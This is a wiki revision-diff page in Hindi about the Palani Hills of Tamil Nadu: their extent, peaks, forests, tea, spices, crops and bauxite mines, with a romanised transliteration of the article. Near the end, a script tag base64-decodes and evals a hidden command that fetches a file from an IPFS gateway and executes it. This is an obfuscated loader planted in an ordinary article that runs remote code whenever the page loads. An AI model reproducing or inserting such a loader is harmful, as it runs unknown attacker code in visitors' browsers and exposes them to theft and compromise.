Difference between revisions of "पालनी पहाड़ियाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''पालनी पर्वत श्रेणी''', पश्चिमी घाट का एक पूर्ववर्ती विस्तार है।
+
[[चित्र:Palani-Hills.jpg|thumb|250px|पालनी पहाड़ियाँ]]
*पालनी पहाड़ियाँ दक्षिण [[भारत]] के दक्षिण-पश्चिम [[तमिलनाडु]] में स्थित है।  
+
'''पालनी पहाड़ियाँ''' [[दक्षिण भारत]] के दक्षिण-पश्चिम [[तमिलनाडु]] में स्थित, पश्चिमी घाट और [[इलायची की पहाड़ी|इलायची पहाड़ियों]] का एक पूर्ववर्ती विस्तार है।  
 
*[[केरल]] राज्य में [[अन्नामलाई पहाड़ियाँ|अन्नामलाई पहाड़ियों]] का क्रमिक विस्तार रूप पालनी लगभग 70 कि.मी. चौड़ा और 23 कि.मी. लंबा है।  
 
*[[केरल]] राज्य में [[अन्नामलाई पहाड़ियाँ|अन्नामलाई पहाड़ियों]] का क्रमिक विस्तार रूप पालनी लगभग 70 कि.मी. चौड़ा और 23 कि.मी. लंबा है।  
 
*दक्षिण में पालनी पहाड़ियाँ अचानक तीखे ढाल के रूप में समाप्त हो जाती हैं।
 
*दक्षिण में पालनी पहाड़ियाँ अचानक तीखे ढाल के रूप में समाप्त हो जाती हैं।
 
*पश्चिम में स्थित ऊपरी पालनी घुमावदार पहाड़ियों का क्षेत्र है, जो मोटी घास से ढका हुआ है; घाटियों में घने जंगल पाए जाते हैं।  
 
*पश्चिम में स्थित ऊपरी पालनी घुमावदार पहाड़ियों का क्षेत्र है, जो मोटी घास से ढका हुआ है; घाटियों में घने जंगल पाए जाते हैं।  
 
*इसकी चोटियों में वंडारावु 2,553 मीटर, वेंबाडी शोला 2,505 मीटर; और क्रुमांकाडी 2,451 मीटर शामिल हैं।  
 
*इसकी चोटियों में वंडारावु 2,553 मीटर, वेंबाडी शोला 2,505 मीटर; और क्रुमांकाडी 2,451 मीटर शामिल हैं।  
*पालनी पहाड़ियों पर बसे गांवों में [[शाक-सब्ज़ी|सब्ज़ियों]] और [[फल|फलों]] की खेती होती है, जिनमें [[आलू]], फलियां कंद वाली फ़सलें नाशपाती और आडू शामिल हैं। पालनी में बॉक्साइट की खानें भी हैं।
+
*कटिबन्धीय वर्षा वनों से ये पहाड़ियाँ आच्छादित हैं। पालनी पहाड़ी [[चाय]] के बाग़ानों के लिए प्रसिद्ध है। गर्म मसालों की खेती भी यहाँ पर की जाती है।
 +
*पालनी पहाड़ियों पर बसे गांवों में [[शाक-सब्ज़ी|सब्ज़ियों]] और [[फल|फलों]] की खेती होती है, जिनमें [[आलू]], फलियां कंद वाली फ़सलें [[नाशपाती]] और आडू शामिल हैं। पालनी में [[बॉक्साइट]] की खानें भी हैं।
 
*पूर्व में निम्न पालनी औसतन 900-1,500 मीटर भ्रमित कर देने वाली ऊँची चोटियों का अव्यवस्थित समूह है, जो गहरी वनाच्छादित घाटियों से विभक्त हैं।  
 
*पूर्व में निम्न पालनी औसतन 900-1,500 मीटर भ्रमित कर देने वाली ऊँची चोटियों का अव्यवस्थित समूह है, जो गहरी वनाच्छादित घाटियों से विभक्त हैं।  
 
*सागौन के वृक्ष भी व्यापक पैमाने पर लगाए गए हैं।  
 
*सागौन के वृक्ष भी व्यापक पैमाने पर लगाए गए हैं।  
*महत्त्वपूर्ण नक़दी फ़सलों में कॉफ़ी, [[केला]], [[इलायची]], [[नीबू]] प्रजाति के फल और [[हल्दी]] शामिल हैं।
+
*महत्त्वपूर्ण नक़दी फ़सलों में [[कॉफ़ी]], [[केला]], [[इलायची]], [[नीबू]] प्रजाति के [[फल]] और [[हल्दी]] शामिल हैं।
 
 
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 06:08, 3 July 2012

thumb|250px|palani paha diyaan palani paha diyaan dakshin bharat ke dakshin-pashchim tamilanadu mean sthit, pashchimi ghat aur ilayachi paha diyoan ka ek poorvavarti vistar hai.

  • keral rajy mean annamalaee paha diyoan ka kramik vistar roop palani lagabhag 70 ki.mi. chau da aur 23 ki.mi. lanba hai.
  • dakshin mean palani paha diyaan achanak tikhe dhal ke roop mean samapt ho jati haian.
  • pashchim mean sthit oopari palani ghumavadar paha diyoan ka kshetr hai, jo moti ghas se dhaka hua hai; ghatiyoan mean ghane jangal pae jate haian.
  • isaki chotiyoan mean vandaravu 2,553 mitar, veanbadi shola 2,505 mitar; aur krumaankadi 2,451 mitar shamil haian.
  • katibandhiy varsha vanoan se ye paha diyaan achchhadit haian. palani paha di chay ke baganoan ke lie prasiddh hai. garm masaloan ki kheti bhi yahaan par ki jati hai.
  • palani paha diyoan par base gaanvoan mean sabziyoan aur phaloan ki kheti hoti hai, jinamean aloo, phaliyaan kand vali fasalean nashapati aur adoo shamil haian. palani mean b aauksait ki khanean bhi haian.
  • poorv mean nimn palani ausatan 900-1,500 mitar bhramit kar dene vali ooanchi chotiyoan ka avyavasthit samooh hai, jo gahari vanachchhadit ghatiyoan se vibhakt haian.
  • sagaun ke vriksh bhi vyapak paimane par lagae ge haian.
  • mahattvapoorn naqadi fasaloan mean k aaufi, kela, ilayachi, niboo prajati ke phal aur haldi shamil haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh